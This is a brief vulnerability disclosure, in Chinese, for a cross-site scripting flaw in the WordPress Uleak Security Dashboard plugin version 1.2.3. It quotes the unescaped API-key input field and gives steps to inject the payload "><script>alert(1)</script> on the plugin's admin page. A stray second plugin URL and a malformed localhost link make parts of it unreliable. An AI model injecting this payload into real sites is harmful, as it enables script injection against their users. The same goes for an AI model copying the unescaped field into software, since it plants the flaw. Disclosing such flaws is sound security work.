WordPress Uleak 安全仪表板 1.2.3 跨站点脚本

# 供应​​商主页：https://wordpress.org/plugins/uleak-security-dashboard/ <https://wordpress.org/plugins/amministrazione-aperta/>

# 版本：1.2.3

# 测试：火狐

# 漏洞代码：

<th scope="row"><label>ULeak API Key*: </label></th>
<td><input type="text" name="ul_apikey" placeholder="XXXXXXXXXXX"
value="'.$user['apikey'].'"><span class="description">(Insert your ULeak
API Key. Find your Credentials in your profil settings <a target="_blank"
href="https://uleak.de/profil">here</a>)</span></td>

1) 安装 uleak-security-dashboard WordPress 插件

2) Naviagete 到 http:// /localhost/wp-admin/tools.php?page=uleak

3)在 *ULeak API Key*: *filed 中注入有效负载```"><script>alert(1)</script>`` : *filed.

4) XSS将触发。